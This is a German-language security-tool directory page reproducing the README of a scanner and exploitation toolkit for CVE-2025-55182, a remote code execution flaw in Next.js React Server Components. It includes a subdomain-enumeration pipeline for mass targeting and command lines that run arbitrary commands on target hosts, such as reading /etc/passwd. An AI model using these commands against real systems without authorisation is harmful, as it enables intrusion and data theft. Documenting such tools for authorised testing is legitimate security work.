Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182-Simple-Scanner-main — Mehrsprachiger Scanner für CVE-2025-55182 (RCE) in Next.js React Server Components, mit Einzel-/Massen-Scanmodi und integriertem Bug-Bounty-Reconnaissance-Workflow. | Kitploit
Tools/GitHubGitHub/jan0x190/cve-2025-55182-simple-scanner-main
AufklärungSchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsSubdomain-EnumerationLernen & Bildung
GitHubjan0x190/cve-2025-55182-simple-scanner-main

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182-Simple-Scanner-main

Mehrsprachiger Scanner für CVE-2025-55182 (RCE) in Next.js React Server Components, mit Einzel-/Massen-Scanmodi und integriertem Bug-Bounty-Reconnaissance-Workflow.

Repository anzeigen
1vor 8 MonatenNoch nicht geprüft

CVE-2025-55182: RCE-Scanner für React Server Components

Ein umfassendes Toolkit zur Erkennung und Ausnutzung von CVE-2025-55182, einer kritischen Remote-Code-Ausführungsschwachstelle in Next.js-Anwendungen, die React Server Components verwenden.

Dieses Repository enthält einen einheitlichen Bash-Scanner (Einzel- und Massenmodus), Python/Go-Implementierungen und einen Bug-Bounty-Aufklärungs-Workflow.

Scanner Menu Scanner Demo


📂 Repository-Struktur

  • scanner.sh — All-in-One-Bash-Skript für Einzelziel- und Massenscans
  • python/exploit.py — Stabile Python-Implementierung (besseres JSON-Escaping)
  • go/main.go — Hochleistungs-Implementierung (kompilierbar)

🚀 Aufklärungs-Workflow (Bug-Bounty-Methodik)

Für die Massenjagd auf Wildcard-Domains verwenden Sie diese Pipeline, um Ziele vor dem Scannen zu filtern:

root@kitploit:~
# 1. Enumerate subdomains
subfinder -dL wildcards.txt -all -recursive > subs.txt

# 2. Filter for live hosts
httpx -l subs.txt -o live.txt

# 3. Pre-scan detection using Nuclei (optional)
nuclei -l live.txt -t CVE-2025-55182.yaml -o final.txt

🛠️ Bash-Scanner-Nutzung (Empfohlen)

Das Skript scanner.sh unterstützt Einzelziel-Scans und Massen-Scans aus einer Dateiliste.

🔧 Installation

root@kitploit:~
chmod +x scanner.sh

1️⃣ Einzelziel-Modus

Am besten geeignet zur Überprüfung eines bestimmten Ziels mit ausführlicher Ausgabe.

root@kitploit:~
# Basic check (defaults to "id")
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d https://target.com -c "cat /etc/passwd"

2️⃣ Massen-Scan-Modus

Scannt effizient eine Liste von URLs und speichert verwundbare Hosts in einer Datei.

root@kitploit:~
# Scan a list of URLs
./scanner.sh -l live.txt -c "whoami"

# Custom output file
./scanner.sh -l live.txt -o my_bounty.txt

Optionen


🐍 Python-Version

Verwenden Sie diese Version, wenn Probleme mit dem Bash-Escaping von Sonderzeichen auftreten.

Voraussetzungen

root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python3 python/exploit.py -u http://target.com -c "uname -a"

🐹 Go-Version

Hohe Leistung, minimale Abhängigkeiten.

Direkt ausführen

root@kitploit:~
go run go/main.go -u http://target.com -c "id"

Binärdatei erstellen

root@kitploit:~
cd go
go build -o cve-scanner main.go
./cve-scanner -u http://target.com

⚠️ Haftungsausschluss

Dieses Tool dient ausschließlich zu Bildungszwecken und autorisierten Sicherheitstests. Eine unbefugte Nutzung ist strengstens illegal. Der Entwickler übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.


🔗 Referenzen

  • NVD CVE-Detail: https://nvd.nist.gov/vuln/detail/CVE-2025-55182

  • React-Sicherheitshinweis (React Server Components-Schwachstelle): https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components

  • ProjectDiscovery Nuclei-Vorlage: https://cloud.projectdiscovery.io/library/CVE-2025-55182

Tool herunterladen
FlagBeschreibung
-d, --domainEinzelziel-URL
-l, --listDatei mit einer Liste von URLs
-c, --commandAuszuführender Befehl (Standard: id)
-o, --outputAusgabedatei für verwundbare Hosts (Standard: vulnerable_hosts.txt)